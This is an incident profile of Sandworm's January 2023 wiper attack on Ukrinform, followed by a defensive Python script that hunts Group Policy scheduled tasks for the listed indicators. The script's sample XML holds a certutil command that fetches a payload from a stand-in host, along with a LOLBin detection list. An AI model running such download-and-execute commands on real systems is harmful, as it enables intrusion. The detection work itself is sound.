Cyber Incident Victim: Ukrinform

Date:

Jan 2023

Location:

Ukraine

Summary

A cyberattack attributed to the Russian GRU-linked Sandworm group (tracked by CERT-UA as UAC-0082) targeted Ukraine's national news agency with a set of destructive tools: the wipers CaddyWiper, ZeroWipe, AwfulShred and BidSwipe, plus the abused Microsoft Sysinternals utility SDelete. The attackers deployed them through a Group Policy Object to disrupt operations during a press briefing, causing temporary loss of internet connectivity and a 15-minute broadcast interruption before services were restored. The intrusion, claimed by the pro-Russian "CyberArmyofRussia_Reborn" Telegram channel, relied on network access gained weeks earlier and was only partially successful: a limited number of data storage systems were affected, while user workstations were not. Ukrainian authorities confirmed the attribution and noted its alignment with Sandworm's historical tactics against critical infrastructure.


Description

On January 17, 2023, the Ukrainian national news agency Ukrinform experienced a cyberattack during a scheduled press briefing hosted by Yurii Shchyhol, head of Ukraine's State Service of Special Communications and Information Protection (SSSCIP). The attack disrupted internet connectivity, forcing a 15-minute interruption of all online broadcasts from the Media Center. Ukrainian investigators, including the Computer Emergency Response Team (CERT-UA) and SSSCIP, attributed the incident to the Russian state-sponsored threat group UAC-0082, widely known as Sandworm, which has documented ties to the GRU, Russia's military intelligence agency. The attackers deployed five distinct destructive tools, CaddyWiper, ZeroWipe, SDelete, AwfulShred and BidSwipe, targeting Windows, Linux and FreeBSD systems to destroy the integrity and availability of stored data. Sandworm used a Group Policy Object (GPO) to distribute the payloads centrally as scheduled tasks, which itself indicates the domain had been compromised beforehand. The Russian-aligned Telegram channel "CyberArmyofRussia_Reborn" claimed responsibility minutes after the disruption began; CERT-UA assesses that the channel serves to publicize Sandworm's destructive operations in addition to its routine DDoS and defacement claims. The attack coincided with Shchyhol's planned discussion of Russia's hybrid warfare tactics, including cyberattacks preceding missile strikes on critical infrastructure. While the malware execution partially succeeded, affecting several data storage systems, SSSCIP technicians restored connectivity quickly, allowing the briefing to resume. Shchyhol publicly dismissed the attack's impact, stating it merely delayed the event and symbolically foreshadowed Russia's eventual defeat.


CERT-UA's investigation, initiated on the day of the attack, revealed that Sandworm had gained access to Ukrinform's systems no later than December 7, 2022, establishing the foothold used for the January 17 operation. Forensic analysis identified malicious scripts and binaries, including CaddyWiper v3, ZeroWipe and the repurposed Microsoft utility SDelete, executed via a batch file ("news.bat"). The Linux wiper AwfulShred and the FreeBSD-targeting BidSwipe show that the operators prepared payloads for each platform present in the environment. The tools overwrite files with null bytes or random data before deleting them, but the attempt failed to disrupt most user workstations. Compromise indicators included anomalous processes (e.g., dnscmd, certutil), scheduled tasks (e.g., Windows_Security_Update_HxW) and files such as C:\Users\new.exe. Network artifacts linked the attack to TOR exit nodes in Germany, the Netherlands, France and Ukraine, hosted by providers such as Digitalcourage and Stark Industries. CERT-UA contained the threat by identifying the compromised infrastructure component that enabled unauthorized remote access, limiting data loss. The agency confirmed Sandworm's involvement through tactical overlaps, including GPO abuse and wiper deployment patterns consistent with prior campaigns such as Industroyer2. Despite partial data destruction, Ukrinform resumed normal operations after recovery, underscoring the attack's limited operational impact relative to its symbolic timing during a high-profile government briefing.
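The GPO-pushed scheduled tasks described above leave a file-system trail in SYSVOL, under each policy's Machine\Preferences\ScheduledTasks\ScheduledTasks.xml, and that file is the natural place to hunt for this staging technique. The following Python is an example added to this page; it is not CERT-UA's or Ukrinform's tooling and is not code from the page's sources. It parses the Group Policy Preferences ScheduledTasks.xml layout and flags any task whose name or action matches the indicators the page lists (the task name Windows_Security_Update_HxW, the file C:\Users\new.exe, the processes certutil and dnscmd) or that launches a binary from a user-writable path. The XML sample is constructed for the example: the policy and task GUIDs, timestamps, the benign cleanup task and the certutil task are invented, as is the URL example.invalid.

```python
"""Hunt Group Policy Preference scheduled tasks for wiper staging.

Example code added to this page, not CERT-UA's or Ukrinform's tooling.
Run it over every \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\
Preferences\ScheduledTasks\ScheduledTasks.xml; the sample below is constructed.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Indicators taken from the page's description of the incident.
KNOWN_BAD_TASK_NAMES = {"Windows_Security_Update_HxW"}
KNOWN_BAD_PATHS = {r"c:\users\new.exe"}
# Processes the page names as anomalous; both are legitimate Windows
# binaries that are routinely abused to fetch or stage payloads.
LOLBINS = {"certutil.exe", "dnscmd.exe"}
# Generic heuristic: a machine-wide scheduled task should not execute
# anything from a user-writable or temporary location.
USER_WRITABLE = re.compile(
    r"^(?:c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\|%temp%|%appdata%)",
    re.IGNORECASE,
)


def _norm(value):
    """Lower-case and strip quotes so path comparisons are case-insensitive."""
    return value.strip().strip('"').lower()


def find_suspicious_tasks(xml_text):
    """Return one finding dict per TaskV2/ImmediateTaskV2 that trips a rule."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root.iter():
        if task.tag not in ("TaskV2", "ImmediateTaskV2"):
            continue
        name = task.get("name", "")
        reasons = []
        if name in KNOWN_BAD_TASK_NAMES:
            reasons.append("task name matches indicator " + name)
        for action in task.iter("Exec"):
            cmd = _norm(action.findtext("Command", ""))
            args = _norm(action.findtext("Arguments", ""))
            # Naive whitespace split: quoted paths containing spaces would
            # need a proper Windows command-line tokenizer.
            for token in [cmd] + args.split():
                if token in KNOWN_BAD_PATHS:
                    reasons.append("action references indicator " + token)
                elif USER_WRITABLE.match(token):
                    reasons.append("action uses user-writable path " + token)
            basename = cmd.rsplit("\\", 1)[-1]
            if basename in LOLBINS:
                reasons.append("action runs " + basename)
        if reasons:
            findings.append({"name": name, "reasons": reasons})
    return findings


# Constructed sample in the GPP ScheduledTasks.xml layout. GUIDs, times,
# the cleanup task and the certutil task are invented for illustration;
# the second task reproduces the page's task-name and file indicators.
SAMPLE_SCHEDULED_TASKS_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Cleanup Temp" image="2"
          changed="2022-11-01 09:00:00" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="U" name="Cleanup Temp" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Windows_Security_Update_HxW"
          image="0" changed="2023-01-17 10:05:00" uid="{66666666-7777-8888-9999-000000000000}">
    <Properties action="C" name="Windows_Security_Update_HxW" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\cmd.exe</Command><Arguments>/c C:\Users\new.exe</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Update Check"
          image="0" changed="2023-01-17 10:06:00" uid="{77777777-8888-9999-0000-111111111111}">
    <Properties action="C" name="Update Check" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\certutil.exe</Command>
        <Arguments>-urlcache -split -f http://example.invalid/u C:\ProgramData\u.exe</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    # Usage: python gpp_task_hunt.py [ScheduledTasks.xml ...]; no args runs the sample.
    sources = [open(p, encoding="utf-8").read() for p in sys.argv[1:]] or [SAMPLE_SCHEDULED_TASKS_XML]
    for text in sources:
        for finding in find_suspicious_tasks(text):
            print(finding["name"], "->", "; ".join(finding["reasons"]))
```

The name and path rules are exact-match indicators and will only ever catch a replay of this incident; the user-writable-path and LOLBIN rules are what catch the next variant, at the cost of some tuning against legitimate deployment tasks in your own SYSVOL.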
